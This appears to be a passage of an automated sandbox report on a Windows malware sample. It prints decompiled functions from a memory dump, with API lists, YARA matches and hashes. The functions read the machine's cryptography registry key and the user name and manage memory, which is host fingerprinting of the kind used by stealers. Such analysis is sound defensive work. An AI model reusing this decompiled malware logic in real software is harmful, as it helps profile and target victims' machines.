                                                                                                                                                                                          • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                          • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406DA8, Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t56);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                                                                                                          0x00406da8
                                                                                                                                                                                          0x00406db6
                                                                                                                                                                                          0x00406db9
                                                                                                                                                                                          0x00406dc1
                                                                                                                                                                                          0x00406dc9
                                                                                                                                                                                          0x00406dd0
                                                                                                                                                                                          0x00406dd1
                                                                                                                                                                                          0x00406dd6
                                                                                                                                                                                          0x00406dd9
                                                                                                                                                                                          0x00406ddc
                                                                                                                                                                                          0x00406de3
                                                                                                                                                                                          0x00406e08
                                                                                                                                                                                          0x00406e2f
                                                                                                                                                                                          0x00406e3f
                                                                                                                                                                                          0x00406e46
                                                                                                                                                                                          0x00406e49
                                                                                                                                                                                          0x00406e4c
                                                                                                                                                                                          0x00406e5e

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 967375698-0
                                                                                                                                                                                          • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                          • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406DAC, Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t55);
				_push(0x406e5f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406E66);
				return E00403B98( &_v12, 2);
			}












                                                                                                                                                                                          0x00406db6
                                                                                                                                                                                          0x00406db9
                                                                                                                                                                                          0x00406dbc
                                                                                                                                                                                          0x00406dc1
                                                                                                                                                                                          0x00406dc9
                                                                                                                                                                                          0x00406dd0
                                                                                                                                                                                          0x00406dd1
                                                                                                                                                                                          0x00406dd6
                                                                                                                                                                                          0x00406dd9
                                                                                                                                                                                          0x00406ddc
                                                                                                                                                                                          0x00406de3
                                                                                                                                                                                          0x00406e08
                                                                                                                                                                                          0x00406e2f
                                                                                                                                                                                          0x00406e3f
                                                                                                                                                                                          0x00406e46
                                                                                                                                                                                          0x00406e49
                                                                                                                                                                                          0x00406e4c
                                                                                                                                                                                          0x00406e5e

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 967375698-0
                                                                                                                                                                                          • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                          • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                          0x0040138b
                                                                                                                                                                                          0x00401395
                                                                                                                                                                                          0x004013a4
                                                                                                                                                                                          0x00401397
                                                                                                                                                                                          0x00401397
                                                                                                                                                                                          0x00401397
                                                                                                                                                                                          0x004013aa
                                                                                                                                                                                          0x004013b7
                                                                                                                                                                                          0x004013bc
                                                                                                                                                                                          0x004013be
                                                                                                                                                                                          0x004013c2
                                                                                                                                                                                          0x004013cb
                                                                                                                                                                                          0x004013d2
                                                                                                                                                                                          0x004013de
                                                                                                                                                                                          0x004013e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004013e5
                                                                                                                                                                                          0x004013d2
                                                                                                                                                                                          0x004013ea

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                          • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                          • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                                                                                                          • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004065C4, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065C4(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403B80(_t14);
				} else {
					_t11 = E00403D10(_t14, 0x100,  &_v516);
				}
				return _t11;
			}











                                                                                                                                                                                          0x004065c4
                                                                                                                                                                                          0x004065c6
                                                                                                                                                                                          0x004065c8
                                                                                                                                                                                          0x004065cd
                                                                                                                                                                                          0x004065d3
                                                                                                                                                                                          0x004065d5
                                                                                                                                                                                          0x004065e9
                                                                                                                                                                                          0x004065ed
                                                                                                                                                                                          0x00406603
                                                                                                                                                                                          0x004065ef
                                                                                                                                                                                          0x004065fa
                                                                                                                                                                                          0x004065fa
                                                                                                                                                                                          0x0040660f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          • Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                          • Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004065C8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065C8(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403B80(_t13);
				} else {
					_t10 = E00403D10(_t13, 0x100,  &_v516);
				}
				return _t10;
			}










                                                                                                                                                                                          0x004065c8
                                                                                                                                                                                          0x004065cd
                                                                                                                                                                                          0x004065d3
                                                                                                                                                                                          0x004065d5
                                                                                                                                                                                          0x004065e9
                                                                                                                                                                                          0x004065ed
                                                                                                                                                                                          0x00406603
                                                                                                                                                                                          0x004065ef
                                                                                                                                                                                          0x004065fa
                                                                                                                                                                                          0x004065fa
                                                                                                                                                                                          0x0040660f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                          • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}





                                                                                                                                                                                          0x00403614
                                                                                                                                                                                          0x0040361a
                                                                                                                                                                                          0x00403620

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 626452242-0
                                                                                                                                                                                          • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                          • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401464, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0x41c5d4
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x41c5b0 = 1;
							}
							E0040126C(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}
















                                                                                                                                                                                          0x00401468
                                                                                                                                                                                          0x0040146b
                                                                                                                                                                                          0x0040146f
                                                                                                                                                                                          0x00401472
                                                                                                                                                                                          0x0040147c
                                                                                                                                                                                          0x00401480
                                                                                                                                                                                          0x00401487
                                                                                                                                                                                          0x0040148b
                                                                                                                                                                                          0x004014e4
                                                                                                                                                                                          0x00401493
                                                                                                                                                                                          0x00401495
                                                                                                                                                                                          0x00401495
                                                                                                                                                                                          0x0040149a
                                                                                                                                                                                          0x0040149e
                                                                                                                                                                                          0x004014a5
                                                                                                                                                                                          0x004014ab
                                                                                                                                                                                          0x004014ad
                                                                                                                                                                                          0x004014ad
                                                                                                                                                                                          0x004014b3
                                                                                                                                                                                          0x004014b3
                                                                                                                                                                                          0x004014ba
                                                                                                                                                                                          0x004014bc
                                                                                                                                                                                          0x004014bc
                                                                                                                                                                                          0x004014c8
                                                                                                                                                                                          0x004014cf
                                                                                                                                                                                          0x004014d1
                                                                                                                                                                                          0x004014d1
                                                                                                                                                                                          0x004014dd
                                                                                                                                                                                          0x004014dd
                                                                                                                                                                                          0x004014a5
                                                                                                                                                                                          0x004014e2
                                                                                                                                                                                          0x004014e2
                                                                                                                                                                                          0x004014ec
                                                                                                                                                                                          0x004014f2
                                                                                                                                                                                          0x004014f9
                                                                                                                                                                                          0x0040151b
                                                                                                                                                                                          0x0040151b
                                                                                                                                                                                          0x00401503
                                                                                                                                                                                          0x00401509
                                                                                                                                                                                          0x00401511
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                          • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x41c5d4
				while(_t29 != 0x41c5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                          0x00401523
                                                                                                                                                                                          0x00401527
                                                                                                                                                                                          0x0040152e
                                                                                                                                                                                          0x00401543
                                                                                                                                                                                          0x0040154b
                                                                                                                                                                                          0x00401551
                                                                                                                                                                                          0x00401557
                                                                                                                                                                                          0x0040155a
                                                                                                                                                                                          0x0040159e
                                                                                                                                                                                          0x00401562
                                                                                                                                                                                          0x00401562
                                                                                                                                                                                          0x00401565
                                                                                                                                                                                          0x00401568
                                                                                                                                                                                          0x0040156c
                                                                                                                                                                                          0x0040156e
                                                                                                                                                                                          0x0040156e
                                                                                                                                                                                          0x00401574
                                                                                                                                                                                          0x00401576
                                                                                                                                                                                          0x00401576
                                                                                                                                                                                          0x0040157c
                                                                                                                                                                                          0x00401589
                                                                                                                                                                                          0x00401590
                                                                                                                                                                                          0x00401592
                                                                                                                                                                                          0x00401598
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401598
                                                                                                                                                                                          0x00401590
                                                                                                                                                                                          0x0040159c
                                                                                                                                                                                          0x0040159c
                                                                                                                                                                                          0x004015ad

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                          • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015B0, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0x41c5d4
				while(_t19 != 0x41c5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                                                                                          0x004015b4
                                                                                                                                                                                          0x004015c5
                                                                                                                                                                                          0x004015cc
                                                                                                                                                                                          0x004015d5
                                                                                                                                                                                          0x004015d9
                                                                                                                                                                                          0x004015dc
                                                                                                                                                                                          0x004015df
                                                                                                                                                                                          0x0040161f
                                                                                                                                                                                          0x004015e7
                                                                                                                                                                                          0x004015e7
                                                                                                                                                                                          0x004015ea
                                                                                                                                                                                          0x004015ed
                                                                                                                                                                                          0x004015f2
                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                          0x004015f9
                                                                                                                                                                                          0x004015fb
                                                                                                                                                                                          0x004015fb
                                                                                                                                                                                          0x004015ff
                                                                                                                                                                                          0x0040160a
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x00401613
                                                                                                                                                                                          0x00401613
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x0040161d
                                                                                                                                                                                          0x0040161d
                                                                                                                                                                                          0x0040162c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                          • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00414408, Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				struct _WIN32_FIND_DATAW _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v716;
				char _v720;
				char _v724;
				char _v728;
				char _v732;
				char _v736;
				char _v740;
				char _v744;
				intOrPtr _v748;
				char _v752;
				char _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				void* _t239;
				void* _t295;
				intOrPtr* _t299;
				void* _t301;
				int _t312;
				int _t333;
				signed int _t343;
				long _t349;
				int _t354;
				int _t377;
				int _t383;
				void* _t387;
				intOrPtr* _t425;
				intOrPtr _t428;
				intOrPtr* _t456;
				int _t460;
				intOrPtr _t464;
				intOrPtr* _t471;
				intOrPtr _t486;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t499;
				void* _t534;
				void* _t556;
				void* _t570;
				void* _t573;
				signed int _t575;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr* _t579;

				_t574 = __esi;
